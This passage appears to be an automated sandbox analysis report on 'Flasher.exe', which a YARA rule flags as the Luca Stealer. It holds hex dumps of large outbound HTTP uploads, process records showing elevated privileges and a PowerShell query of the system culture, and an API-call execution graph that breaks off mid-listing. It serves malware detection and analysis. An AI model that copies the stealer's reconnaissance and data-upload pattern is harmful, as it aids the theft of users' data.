                                                                    2024-12-27 20:48:09 UTC16384OUTData Raw: 86 11 d7 18 6d 12 50 26 65 85 ae d3 7a 73 7d 73 02 aa 97 b6 37 56 2e 01 e5 82 19 f7 e1 34 3d 2e 00 c2 f0 a5 5a 2f bf c0 26 e7 93 17 5f 2a 19 b6 36 71 80 ac a8 e7 d5 b9 b2 77 75 69 5e 1f 46 8c f6 26 f1 f3 f9 d1 07 8c ba ab cb aa a1 ad 84 c9 0e a8 63 06 6c ac 40 c5 99 53 82 a1 0b 30 07 10 d6 54 96 3c ff 3c 8e 30 ec f6 0d 43 d6 df d8 c8 0d c8 7d 7e a3 e7 a4 e9 83 6d 7d 71 92 00 eb b6 df 7c 53 bb df 67 40 f5 10 b9 89 93 52 2c db 22 a8 63 d0 fa 55 ea e6 50 07 02 86 1f a8 45 12 cf 4d f3 4b 91 db b4 36 24 76 fd 0b 2c 18 b1 09 a9 fc 5d d3 6b c1 fc ea 40 f5 00 19 b7 be 6e 63 bd 99 57 11 90 d5 bc 1b e7 f9 af 01 86 dd 3c da b5 d9 13 79 fc 8a a7 5f 9f 76 18 f9 cd 09 6c 6a aa 77 2c 8c 7c 0b ce 62 1a 17 b9 b5 6e 5e f1 40 00 e9 89 0d b6 94 dc c1 d6 6e 1c 0c 3d 5d 85 05
                                                                    Data Ascii: mP&ezs}s7V.4=.Z/&_*6qwui^F&cl@S0T<<0C}~m}q|Sg@R,"cUPEMK6$v,]k@ncW<y_vljw,|bn^@n=]
                                                                    2024-12-27 20:48:09 UTC16384OUTData Raw: 15 78 f7 bb df bd 7e fd e7 f0 ef ca 2b af 2c f9 ff d4 3f 01 7e c1 fb 5f 1a 4f fe ba 5d 07 80 79 bd e5 c3 cd 9e 33 c5 f3 a2 e3 39 00 fc ee 1c 00 7e db df 38 70 00 b8 c8 dd 3f 80 ba e1 28 ae 97 9e 6b cc d7 e5 1e d7 1f c7 1c 56 5f 57 e3 a0 1c 7e 81 3a c8 3f f4 8d 73 ab c3 b6 17 f0 30 c3 7e 79 5b b4 35 f6 47 0d 2c 83 0f a0 81 75 21 b2 e5 fd a3 03 c7 75 a0 75 36 b6 77 fc 51 f1 e1 f9 bf 18 b5 86 f9 7b cf 17 52 e7 b0 b1 9b ae af 9e a7 ed 72 ef ec f0 bc e7 39 7c e4 fa 88 c3 e6 fb eb 34 00 74 c5 87 5d df ba f3 77 d8 1c d6 dd 44 c3 eb 73 9c 57 1d 0e be 42 f6 a2 f9 87 79 86 b5 cc a1 be 6e 1d da b7 7f c3 cc af 45 83 f7 10 68 f5 8c ed b9 95 b7 d1 26 ec a6 be d7 e5 5b 97 63 d3 ba d6 c5 af b5 0d d6 36 f4 af ab 35 f4 77 79 5c 7f 1c b7 6d 7d 47 39 00 1c d7 ee 3d 76 0e ed
                                                                    Data Ascii: x~+,?~_O]y39~8p?(kV_W~:?s0~y[5G,u!uu6wQ{Rr9|4t]wDsWBynEh&[c65wy\m}G9=v
                                                                    2024-12-27 20:48:09 UTC16384OUTData Raw: e3 b9 78 c5 0d ff 57 eb 3f 7b 9d e4 17 d8 bd 37 bd 2b 4e bd e0 81 f1 88 f8 d3 f8 fe c7 3d 39 4e c6 e3 e3 96 9f f8 b8 b8 fe 71 af 8a 17 45 c4 2c ee 1a 37 7c ef 63 22 be f1 9f c4 c9 df ff b4 38 f5 9a 2f 8f 9b ff e1 bf 6c 35 af fa f2 b8 e5 df dc 33 ae ff 9c eb e3 c6 92 ef 1e d7 3f fc 47 e3 c6 8c 8b 4f fc b2 b8 e1 9e bf 1a 27 7f f6 a3 e3 d4 6f 3d aa c5 bc 23 07 59 ae c1 eb e7 8a 8f 8d 5b be e7 4e 71 fd 57 fd 62 c3 c7 dd e2 86 ef 7b 74 c4 73 bf 2f 4e fe f9 9d 22 12 57 5f 00 1c a0 7d ca 17 c6 ec 19 67 e3 ba 47 ff 6c bc e8 1e b9 0f f7 c8 73 ba e3 00 d0 7f 66 e7 96 67 1e cf 3a 39 bc ab 0b 2e eb 3c 2f eb 3c eb 9f c4 c9 d7 7d 7a 5b cf 3f f8 97 b5 9e 07 3d f9 fa 78 f5 43 5f 17 57 7f e5 8f c5 4d ae e7 df fe cd b8 fe f3 07 eb f9 d8 5c cf cb ee 11 a7 5e fd e9 f1 f2 cf
                                                                    Data Ascii: xW?{7+N=9NqE,7|c"8/l53?GO'o=#Y[NqWb{ts/N"W_}gGlsfg:9.</<}z[?=xC_WM\^
                                                                    2024-12-27 20:48:09 UTC16384OUTData Raw: 38 b7 ec d9 7c d0 75 8d 40 f6 a4 2c de 0d 1c e3 c5 15 e9 93 4a 8f d5 b1 8a 01 b2 87 ea dd b1 28 9b cf 18 e5 16 87 7a 3d c8 6b 97 c2 bc 7a 69 13 5f 1c c8 0d 0d 41 da cd a1 6c 1e ef c3 6b e3 c6 79 84 8e 15 67 7c ad 07 f1 ea f2 f2 99 47 02 56 9b 6a 85 93 eb 6f 71 18 a3 2c 59 f7 6e fa 0b 33 65 7d 8e f7 f5 fb ef b7 c3 f1 98 bf 6c 6a 77 fd 17 7c e6 68 71 c8 25 e8 73 0d e4 75 0a 57 ce 23 74 dd fc da cc 09 28 26 ce 58 15 ed f2 d6 0e 9d c5 b9 7c 21 ce 2f 7f e1 a9 5d 2a a3 b2 f9 e5 f6 2d d7 07 e4 ba d0 a7 dd 79 f4 cf 3b ad 05 dd 57 58 f1 25 c3 e2 03 9a 78 7d ce 85 bf 10 6e 71 a8 03 39 c6 50 e7 b1 94 dd 98 b2 5b 5f dd fa ca d0 f3 2b 8b d1 07 dd 66 9f da 25 73 e9 2f 82 8e 11 af ad 30 ea 62 d5 5d df ae 73 a0 55 3d 75 31 fe 32 ad ff 99 29 39 26 6d c6 e8 87 8e 57 d6 2e
                                                                    Data Ascii: 8|u@,J(z=kzi_Alkyg|GVjoq,Yn3e}ljw|hq%suW#t(&X|!/]*-y;WX%x}nq9P[_+f%s/0b]sU=u12)9&mW.
                                                                    2024-12-27 20:48:09 UTC16384OUTData Raw: 35 9f da ff b9 9a 7b 35 ce 61 b5 d7 0d 8a f2 1e 55 3e 58 d6 89 b8 b2 2b 5f a2 75 54 8b b7 d6 95 0f dc 4b c9 5e c0 b7 ed fb e3 0d c0 e7 4d aa 37 38 cf cb d0 9a f1 db eb a2 4d 7a ee fb e3 e3 0d 40 67 f1 3c 6d 3f bf cf 5d 87 f3 19 ae 78 fc 6e bd 02 d9 73 ef 7d 2e 6d 7b 53 87 fe 09 a3 bc 97 e7 da fa 39 17 b7 97 eb 16 5b ef 66 8d b4 86 a4 f5 d8 f6 10 e7 3f 17 c7 fe a1 c7 56 2e f3 8d b2 ba b4 b5 41 8f d3 37 52 e2 36 1b 78 cb bc f7 95 91 98 08 2a 3e f7 33 6d 00 fa 1f 01 29 5f c0 56 2f 78 c6 fd d1 b4 6e cc 0d 34 20 73 ab 2b 5c fb dc 29 9c d8 3d 2a ff b8 01 b8 87 83 3e 06 f1 b0 f4 a0 de f1 f7 73 6f 5d 6f 2b dd 7b 4a 09 48 bb 71 c0 fc f0 77 88 71 6a 93 80 f9 41 cf 98 22 1f 04 81 e6 a1 4d 0e cc 39 8c 2d 6a d3 01 1d 6f ac 31 fa 27 57 32 ed 3e 44 fa 40 09 b4 43 eb 78
                                                                    Data Ascii: 5{5aU>X+_uTK^M78Mz@g<m?]xns}.m{S9[f?V.A7R6x*>3m)_V/xn4 s+\)=*>so]o+{JHqwqjA"M9-jo1'W2>D@Cx
                                                                    2024-12-27 20:48:09 UTC16384OUTData Raw: b4 23 f3 c7 fc 40 4c a3 b4 2e 72 93 cf e6 e0 7e cc 7e d0 f1 92 86 43 f3 a2 dd 3b 7f cb f3 96 7c 01 9f eb a6 f2 31 ff a8 7b e1 d4 63 97 3f e6 bf d8 93 7f ee 73 ac 8f bb 19 2f 96 e6 b1 a7 e7 f5 62 cf fd d6 79 bc fd a8 c3 da 63 7d eb f8 b0 7b 9f 69 fd e2 c0 7d 18 f6 e3 e7 95 9c 45 7d e2 c4 b1 3a da 6f 91 cc fa d3 2f b9 dd bd 6b da d5 46 7e 8c ac 76 e2 4f 71 b0 5b e7 d4 77 8a 9b ea 2f c3 c3 88 7b 2c 86 7f 03 ee a2 be 1f f3 3f 66 1f 55 ec 56 7c cc 67 17 7d 39 c9 7e 34 72 1e 1f a8 f1 6f 3d 50 d0 96 4b 98 1d da e6 cb 47 f3 42 9a ef d6 f9 00 23 9e f6 39 89 bb 68 7c 23 af 7f 31 53 3f 18 cf 76 ea 60 c4 9e 63 b4 15 2d 57 f9 3c 99 33 72 7d 1f 07 02 86 bf 3e 5d 3f ab 42 6f 0e 40 f1 7e 7e f9 19 2d 56 02 76 fc 81 c2 e5 24 ae 2b a5 a4 d4 55 9b 96 5e 00 4c 36 cc 05 54 3d
                                                                    Data Ascii: #@L.r~~C;|1{c?s/byc}{i}E}:o/kF~vOq[w/{,?fUV|g}9~4ro=PKGB#9h|#1S?v`c-W<3r}>]?Bo@~~-Vv$+U^L6T=
                                                                    2024-12-27 20:48:09 UTC16384OUTData Raw: 4d 2e 00 7e 52 2e 00 7a 51 74 ef fd 09 f0 83 cf 7d c7 21 ae b1 9f 3d f9 87 2e 86 21 c2 45 ab ff f9 bd 9e b0 f3 ba f1 d3 2f bf 51 e6 67 3e f9 5a b5 1a 7d 21 7b cc 17 9f ff 06 e0 97 3d ff f9 f1 b9 6f bb fb ad b6 e1 74 f1 d1 8b ec 42 c4 c3 b4 00 f8 0f 72 01 70 3a 56 fd f3 df bf f6 01 4f 0c 29 ef 02 9b b2 5e fd e0 ad 78 cf bf fb b2 f1 cd bf 8d 76 cb 3c 35 17 01 fd 16 e5 f8 c9 b0 23 94 b6 6c fe b7 1f 78 75 fc f5 ef ff ed 9d 9f 01 bb 00 e8 58 fd 2f 6f f5 17 12 74 fb 7b 2f 02 1e 1d bf 06 ae cf 7d 65 5c 10 8b 20 5c f4 5b b9 80 d7 b6 d4 93 0b 86 2b ce d2 be 8c 55 c4 e6 e6 1b a9 03 c2 17 82 54 e7 65 a8 f5 2c 4e 4f f3 1a cc a7 ec aa 23 e7 60 1a 9c 8c 09 51 9f cd 9e f3 b7 48 f5 b1 dd 3c 55 9f 31 8f 81 1f 06 7b f5 27 e3 5a 47 36 b7 bd cf fd 3b ee e5 03 5e 3c 5a 57 8f
                                                                    Data Ascii: M.~R.zQt}!=.!E/Qg>Z}!{=otBrp:VO)^xv<5#lxuX/ot{/}e\ \[+UTe,NO#`QH<U1{'ZG6;^<ZW
                                                                    2024-12-27 20:48:09 UTC16384OUTData Raw: f7 ae ef ed ba 75 d1 ed c3 76 7c 5c 94 61 f5 11 d6 36 f4 5d c7 7f a2 14 00 1d df 70 cc ce eb 50 d6 3e a4 7e 77 ae fb ef c0 30 f6 e9 b2 e7 29 2c e6 5a bd 84 cf dd e9 0f cb b6 54 d5 07 16 fa 52 e4 4e bf 6c da fd 71 dd 75 63 56 18 f4 25 ac e3 f5 61 a6 97 97 7c 7d 58 d8 23 9f 2a 50 5d 34 d4 97 22 77 0b 6b 0a f9 59 85 49 75 40 43 ae b3 8b 91 b4 43 c3 76 59 9d 3c 50 63 54 06 a2 bf 28 fb 02 1c b9 f9 c2 bd 7b d5 f2 7b 9f e3 95 a0 c5 14 bb eb 0f 1c 13 0f 4d d7 65 71 a9 9e 7f ec 47 02 42 1b 50 05 81 c8 4d 7d 51 0b 51 e3 db 21 57 41 9e 9f 1e db 84 d4 c7 d8 f6 09 44 8f 11 b9 95 6f 62 93 ad 0f b4 40 ea 81 8a a7 41 d9 56 82 d4 e7 33 92 bc 7a 40 b6 b0 ca 0a d3 7c 40 93 97 94 7b 9f ca 92 ba 31 99 a3 3a b1 d3 e3 d7 54 3c 65 68 f1 e5 25 68 b2 71 3a a9 1f d2 0e 07 ca df a2
                                                                    Data Ascii: uv|\a6]pP>~w0),ZTRNlqucV%a|}X#*P]4"wkYIu@CCvY<PcT({{MeqGBPM}QQ!WADob@AV3z@|@{1:T<eh%hq:
                                                                    2024-12-27 20:48:11 UTC389INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Fri, 27 Dec 2024 20:48:10 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 1135
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                    Click to jump to process

                                                                    Click to jump to process

                                                                    Click to dive into process behavior distribution

                                                                    Click to jump to process

                                                                    Target ID:0
                                                                    Start time:15:47:59
                                                                    Start date:27/12/2024
                                                                    Path:C:\Users\user\Desktop\Flasher.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Users\user\Desktop\Flasher.exe"
                                                                    Imagebase:0x7ff6d34f0000
                                                                    File size:3'266'048 bytes
                                                                    MD5 hash:7A16F2F0629A440695945DB2A191C6A1
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_LucaStealer, Description: Yara detected Luca Stealer, Source: 00000000.00000000.1650128327.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_LucaStealer, Description: Yara detected Luca Stealer, Source: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:1
                                                                    Start time:15:48:03
                                                                    Start date:27/12/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "Get-Culture | Select -ExpandProperty DisplayName"
                                                                    Imagebase:0x7ff788560000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:2
                                                                    Start time:15:48:03
                                                                    Start date:27/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Reset < >

                                                                      Execution Graph

                                                                      Execution Coverage:14.4%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:46.3%
                                                                      Total number of Nodes:2000
                                                                      Total number of Limit Nodes:167
                                                                      execution_graph 81187 7ff6d36092a6 81188 7ff6d36092ca 81187->81188 81189 7ff6d3609301 81187->81189 81213 7ff6d360747b 72 API calls 81188->81213 81197 7ff6d35df7c0 81189->81197 81192 7ff6d36092e5 81193 7ff6d36093af 81192->81193 81214 7ff6d3578b65 43 API calls 81192->81214 81195 7ff6d360934a 81195->81193 81196 7ff6d3609389 HeapFree 81195->81196 81196->81193 81215 7ff6d35dbdc0 81197->81215 81200 7ff6d35df857 81206 7ff6d35df8df 81200->81206 81239 7ff6d35da120 81200->81239 81201 7ff6d35df8f9 81234 7ff6d35dc040 81201->81234 81205 7ff6d35df88d 81205->81206 81258 7ff6d35dc470 81205->81258 81206->81192 81208 7ff6d35df8c9 81208->81206 81209 7ff6d35df920 memset FindFirstFileW 81208->81209 81210 7ff6d35df946 FindClose 81209->81210 81211 7ff6d35df971 81209->81211 81210->81211 81211->81206 81212 7ff6d35df9d4 HeapFree 81211->81212 81212->81206 81213->81192 81214->81195 81216 7ff6d35da120 42 API calls 81215->81216 81217 7ff6d35dbde9 81216->81217 81218 7ff6d35dbdf9 81217->81218 81219 7ff6d35dc470 54 API calls 81217->81219 81218->81200 81218->81201 81222 7ff6d35dbe23 81219->81222 81220 7ff6d35dbecb 81220->81218 81221 7ff6d35dbfaf HeapFree 81220->81221 81221->81218 81222->81218 81222->81220 81227 7ff6d35dbe81 CreateFileW 81222->81227 81224 7ff6d35dbf3e 81228 7ff6d35dbf7c 81224->81228 81229 7ff6d35dbf4d GetLastError 81224->81229 81225 7ff6d35dbfdc GetLastError 81225->81218 81226 7ff6d35dbf83 HeapFree 81225->81226 81226->81218 81227->81224 81227->81225 81228->81218 81228->81226 81229->81228 81230 7ff6d35dbf59 SetFileInformationByHandle 81229->81230 81230->81228 81231 7ff6d35dbff7 GetLastError CloseHandle 81230->81231 81232 7ff6d35dc015 HeapFree 81231->81232 81233 7ff6d35dc027 81231->81233 81232->81233 81233->81218 81235 7ff6d35dc074 81234->81235 81236 7ff6d35dc123 GetLastError 81235->81236 81237 7ff6d35dc0ad CloseHandle 81235->81237 81238 7ff6d35dc089 GetFileInformationByHandleEx 81235->81238 81236->81237 81237->81206 81238->81236 81238->81237 81240 7ff6d35da145 81239->81240 81241 7ff6d35da2a9 81239->81241 81240->81241 81242 7ff6d35da163 81240->81242 81311 7ff6d3531430 42 API calls 81241->81311 81244 7ff6d35da191 81242->81244 81299 7ff6d35efed0 81242->81299 81309 7ff6d35da2f0 42 API calls 81244->81309 81245 7ff6d35da2ae 81247 7ff6d35da2df 81245->81247 81248 7ff6d35da2cc HeapFree 81245->81248 81247->81205 81248->81247 81252 7ff6d35da240 81253 7ff6d35da25f HeapFree 81252->81253 81254 7ff6d35da27f 81252->81254 81253->81254 81254->81205 81255 7ff6d35da270 81255->81254 81310 7ff6d35d97e0 42 API calls 81255->81310 81257 7ff6d35da1c7 81257->81252 81257->81255 81262 7ff6d35dc4a4 81258->81262 81259 7ff6d35dc4ed 81259->81208 81260 7ff6d35dc642 SetLastError GetFullPathNameW 81260->81262 81263 7ff6d35dc66d GetLastError 81260->81263 81262->81259 81262->81260 81265 7ff6d35dc686 GetLastError 81262->81265 81266 7ff6d35dc6bd 81262->81266 81313 7ff6d3738330 42 API calls 81262->81313 81263->81262 81264 7ff6d35dc713 GetLastError 81263->81264 81267 7ff6d35dc742 81264->81267 81268 7ff6d35dc72c HeapFree 81264->81268 81265->81262 81269 7ff6d35dca79 81265->81269 81270 7ff6d35dca93 81266->81270 81276 7ff6d35dc6c6 81266->81276 81267->81259 81272 7ff6d35dc76b HeapFree 81267->81272 81268->81267 81322 7ff6d3734750 42 API calls 81269->81322 81323 7ff6d37346e0 42 API calls 81270->81323 81272->81259 81273 7ff6d35dca91 81277 7ff6d35dcb1c 81273->81277 81278 7ff6d35dcb06 HeapFree 81273->81278 81275 7ff6d35dc850 81281 7ff6d35dc940 memmove 81275->81281 81320 7ff6d3738330 42 API calls 81275->81320 81276->81275 81284 7ff6d35d9700 4 API calls 81276->81284 81292 7ff6d35dc6ea 81276->81292 81279 7ff6d35dcb43 81277->81279 81280 7ff6d35dcb29 HeapFree 81277->81280 81278->81277 81279->81208 81280->81279 81285 7ff6d35dc974 81281->81285 81286 7ff6d35dc96c 81281->81286 81282 7ff6d35dc838 memmove 81282->81275 81291 7ff6d35dca41 81284->81291 81285->81259 81288 7ff6d35dc9a0 HeapFree 81285->81288 81321 7ff6d35d97e0 42 API calls 81286->81321 81288->81259 81290 7ff6d35dc92d 81290->81281 81291->81292 81293 7ff6d35dcabf 81291->81293 81292->81282 81314 7ff6d35d9700 81292->81314 81295 7ff6d37341f0 42 API calls 81293->81295 81295->81273 81297 7ff6d35dcaaa 81298 7ff6d37341f0 42 API calls 81297->81298 81298->81273 81300 7ff6d35efee5 HeapAlloc 81299->81300 81301 7ff6d35efeed GetProcessHeap 81299->81301 81300->81301 81303 7ff6d35da17f 81301->81303 81304 7ff6d37388cc HeapAlloc 81301->81304 81303->81244 81305 7ff6d37341f0 81303->81305 81306 7ff6d37341ff 81305->81306 81307 7ff6d3734204 81305->81307 81312 7ff6d3531430 42 API calls 81306->81312 81309->81257 81310->81254 81311->81245 81312->81307 81313->81262 81315 7ff6d35d973b 81314->81315 81316 7ff6d35d971d 81314->81316 81318 7ff6d35d9751 81315->81318 81319 7ff6d35efed0 3 API calls 81315->81319 81316->81315 81317 7ff6d35d9724 RtlReAllocateHeap 81316->81317 81317->81318 81318->81282 81318->81297 81319->81318 81320->81290 81321->81285 81324 7ff6d352a3d9 HeapFree 81325 7ff6d352a44e 81324->81325 81326 7ff6d352a458 HeapFree 81325->81326 81327 7ff6d352a46e 81325->81327 81326->81327 81680 7ff6d34f7f98 FindClose 81327->81680 81329 7ff6d352a47a 81330 7ff6d352a49a 81329->81330 81331 7ff6d352a484 HeapFree 81329->81331 81687 7ff6d3611751 81330->81687 81331->81330 81334 7ff6d352a4ba HeapFree 81337 7ff6d352a4cc 81334->81337 81335 7ff6d352a5c6 81338 7ff6d352a5d0 HeapFree 81335->81338 81339 7ff6d352a5e2 81335->81339 81336 7ff6d352a593 81336->81335 82242 7ff6d34f8a64 HeapFree HeapFree HeapFree HeapFree 81336->82242 81337->81336 82239 7ff6d35e0300 47 API calls 81337->82239 81338->81339 81342 7ff6d352a5ec HeapFree 81339->81342 81343 7ff6d352a602 81339->81343 81342->81343 81346 7ff6d352d6b2 81343->81346 81348 7ff6d352a616 HeapFree 81343->81348 81349 7ff6d352a62c 81343->81349 81344 7ff6d352a570 81345 7ff6d352a57d 81344->81345 82240 7ff6d35cd7b8 HeapFree HeapFree 81344->82240 81345->81336 82241 7ff6d35cd7b8 HeapFree HeapFree 81345->82241 81348->81349 81350 7ff6d352a63d HeapFree 81349->81350 81351 7ff6d352a653 81349->81351 81350->81351 81353 7ff6d352a658 HeapFree 81351->81353 81354 7ff6d352a66e 81351->81354 81353->81354 81691 7ff6d35cc354 81354->81691 81356 7ff6d352a6a0 81712 7ff6d35401d0 81356->81712 81359 7ff6d352a7e2 81360 7ff6d352c515 81359->81360 81361 7ff6d352a802 memmove 81359->81361 82336 7ff6d37392c1 81360->82336 81737 7ff6d3531a60 81361->81737 81362 7ff6d352a729 memmove 81365 7ff6d352a6df 81362->81365 81365->81359 81365->81362 81366 7ff6d37392c1 43 API calls 81365->81366 81730 7ff6d35004cb 81365->81730 81366->81365 81367 7ff6d352a8c2 81369 7ff6d352a8cc HeapFree 81367->81369 81370 7ff6d352a8e2 81367->81370 81368 7ff6d352bd2b 81369->81370 81371 7ff6d352a8ec HeapFree 81370->81371 81372 7ff6d352a902 81370->81372 81371->81372 81750 7ff6d35c268b 81372->81750 81681 7ff6d34f7fc0 81680->81681 81682 7ff6d34f7fb3 81680->81682 81681->81329 81683 7ff6d3606f7c 81682->81683 81684 7ff6d3606f69 HeapFree 81682->81684 81685 7ff6d3606fa1 81683->81685 81686 7ff6d3606f89 HeapFree 81683->81686 81684->81683 81685->81329 81688 7ff6d352a4b0 81687->81688 81689 7ff6d361175d 81687->81689 81688->81334 81688->81337 81689->81688 81690 7ff6d3611775 HeapFree 81689->81690 81690->81689 81693 7ff6d35cc36d 81691->81693 81711 7ff6d35cc40a 81691->81711 81692 7ff6d35cc3d5 81694 7ff6d35cc400 81692->81694 81696 7ff6d35cc3f5 81692->81696 81698 7ff6d35efed0 3 API calls 81692->81698 81693->81692 82371 7ff6d3734b30 42 API calls 81693->82371 81697 7ff6d37341f0 42 API calls 81694->81697 81696->81694 81699 7ff6d35cc44c memmove 81696->81699 81700 7ff6d35cc539 81696->81700 81701 7ff6d35cc5a9 GetFileInformationByHandle 81697->81701 81698->81696 81706 7ff6d35cc471 81699->81706 81707 7ff6d35cc4c8 81699->81707 81702 7ff6d37392c1 43 API calls 81700->81702 81703 7ff6d35cc601 GetLastError 81701->81703 81704 7ff6d35cc5db 81701->81704 81705 7ff6d35cc55d 81702->81705 81703->81704 81704->81356 82372 7ff6d37346b0 42 API calls 81705->82372 81706->81705 81709 7ff6d35cc4a6 memmove 81706->81709 81706->81711 81707->81705 81710 7ff6d35cc4f1 memmove 81707->81710 81707->81711 81709->81706 81709->81711 81710->81707 81710->81711 81711->81356 81716 7ff6d35401fc 81712->81716 81726 7ff6d3540272 81712->81726 81713 7ff6d3540695 82376 7ff6d37346e0 42 API calls 81713->82376 81714 7ff6d3540665 82373 7ff6d373463f 42 API calls 81714->82373 81715 7ff6d35406a7 82377 7ff6d3734aa0 42 API calls 81715->82377 81716->81713 81716->81715 81719 7ff6d3540238 memcmp 81716->81719 81720 7ff6d35406b6 81716->81720 81728 7ff6d3540391 81719->81728 81729 7ff6d354024f 81719->81729 82378 7ff6d37346e0 42 API calls 81720->82378 81724 7ff6d3540683 82375 7ff6d373463f 42 API calls 81724->82375 81726->81714 81726->81716 81728->81724 81728->81729 82374 7ff6d373463f 42 API calls 81728->82374 81729->81365 81729->81729 81732 7ff6d35004d8 81730->81732 81734 7ff6d350050b 81730->81734 81731 7ff6d3500601 81731->81365 82379 7ff6d34f9bf7 42 API calls 81732->82379 81734->81731 82380 7ff6d3734ca0 42 API calls 81734->82380 81738 7ff6d3531b4d 81737->81738 81743 7ff6d3531a88 81737->81743 81739 7ff6d3531b7b 81738->81739 81740 7ff6d3734a10 42 API calls 81738->81740 81739->81367 81741 7ff6d3531bbb 81740->81741 82381 7ff6d3531430 42 API calls 81741->82381 81743->81738 81743->81741 81745 7ff6d35efed0 3 API calls 81743->81745 81744 7ff6d3531bc2 81746 7ff6d3531be8 HeapFree 81744->81746 81747 7ff6d3531bfb 81744->81747 81748 7ff6d3531b3b 81745->81748 81746->81747 81747->81367 81748->81738 81749 7ff6d37341f0 42 API calls 81748->81749 81749->81738 82382 7ff6d355e12d 81750->82382 81755 7ff6d35efed0 3 API calls 81759 7ff6d35c26d2 81755->81759 81756 7ff6d35c291b 81757 7ff6d37341f0 42 API calls 81756->81757 81760 7ff6d35c292a 81757->81760 81758 7ff6d35c290b 82415 7ff6d373463f 42 API calls 81758->82415 81759->81756 81759->81758 81761 7ff6d35c2754 81759->81761 82395 7ff6d3566b5e 81761->82395 81764 7ff6d35c27a5 82410 7ff6d355daf7 81764->82410 81767 7ff6d35b50f7 81768 7ff6d35b5126 81767->81768 81774 7ff6d35b51b8 81767->81774 82513 7ff6d3551f0e HeapFree HeapFree HeapFree 81768->82513 81769 7ff6d35b57eb 81771 7ff6d35efed0 3 API calls 81769->81771 81773 7ff6d35b57fd 81771->81773 81772 7ff6d35b512e 82514 7ff6d358e677 HeapFree HeapFree HeapFree HeapFree 81772->82514 81776 7ff6d35b6baf 81773->81776 81782 7ff6d35efed0 3 API calls 81773->81782 81774->81769 81774->81776 82516 7ff6d35db150 81774->82516 82528 7ff6d357f511 42 API calls 81776->82528 81778 7ff6d35b5144 81780 7ff6d35b515d 81778->81780 81781 7ff6d35b514b HeapFree 81778->81781 82515 7ff6d35b37d9 HeapFree 81780->82515 81781->81780 81801 7ff6d35b5850 81782->81801 81785 7ff6d35db150 42 API calls 81789 7ff6d35b52ad 81785->81789 81786 7ff6d35b5166 81788 7ff6d35b56da 81793 7ff6d35b58a1 81802 7ff6d35b5959 81793->81802 81803 7ff6d35efed0 3 API calls 81793->81803 81801->81793 81816 7ff6d35b6bdd 81801->81816 82525 7ff6d358e7a7 HeapFree 81801->82525 81802->81776 81804 7ff6d35b5993 81802->81804 81809 7ff6d35b5905 81803->81809 81809->81816 81821 7ff6d37341f0 42 API calls 81816->81821 81829 7ff6d35b552f HeapFree 81834 7ff6d35b5268 81829->81834 81831 7ff6d35bfcd3 339 API calls 81831->81834 81832 7ff6d35b566d memmove 81832->81834 81833 7ff6d35efed0 3 API calls 81833->81834 81834->81788 81834->81816 81834->81829 81834->81831 81834->81832 81834->81833 82519 7ff6d3562616 45 API calls 81834->82519 82520 7ff6d353df50 43 API calls 81834->82520 82239->81344 82240->81345 82241->81336 82242->81336 83120 7ff6d35d0681 82336->83120 82339 7ff6d37392e3 82339->81368 82340 7ff6d37341f0 42 API calls 82341 7ff6d37392f0 82340->82341 82379->81731 82381->81744 82383 7ff6d355e14a 82382->82383 82386 7ff6d355e171 82382->82386 82385 7ff6d35efed0 3 API calls 82383->82385 82383->82386 82387 7ff6d355e186 82383->82387 82384 7ff6d37341f0 42 API calls 82384->82387 82385->82386 82386->82384 82386->82387 82388 7ff6d355e0e2 82387->82388 82389 7ff6d355e116 82388->82389 82390 7ff6d355e0f3 82388->82390 82389->81755 82416 7ff6d3535345 HeapReAlloc HeapFree 82390->82416 82392 7ff6d355e107 82392->82389 82393 7ff6d37341f0 42 API calls 82392->82393 82394 7ff6d355e12c 82393->82394 82417 7ff6d3550b9d 82395->82417 82397 7ff6d3566b89 82398 7ff6d3566cb5 82397->82398 82399 7ff6d3566d65 82397->82399 82406 7ff6d3566c98 82397->82406 82407 7ff6d3566c6e memcmp 82397->82407 82409 7ff6d3566cef 82397->82409 82398->82409 82451 7ff6d3551caf 43 API calls 82398->82451 82401 7ff6d3566da0 82399->82401 82399->82409 82405 7ff6d3566d51 82401->82405 82452 7ff6d3551caf 43 API calls 82401->82452 82403 7ff6d373463f 42 API calls 82403->82409 82405->81764 82405->82405 82406->82409 82453 7ff6d3566510 43 API calls 82406->82453 82407->82397 82407->82406 82409->82403 82409->82405 82454 7ff6d37358ed 100 API calls 82409->82454 82411 7ff6d355db02 82410->82411 82412 7ff6d352a934 82411->82412 82413 7ff6d3734a10 42 API calls 82411->82413 82412->81767 82414 7ff6d355db46 82413->82414 82416->82392 82418 7ff6d3550bcc 82417->82418 82420 7ff6d3550bb9 82417->82420 82419 7ff6d3550e05 82418->82419 82421 7ff6d355e12d 42 API calls 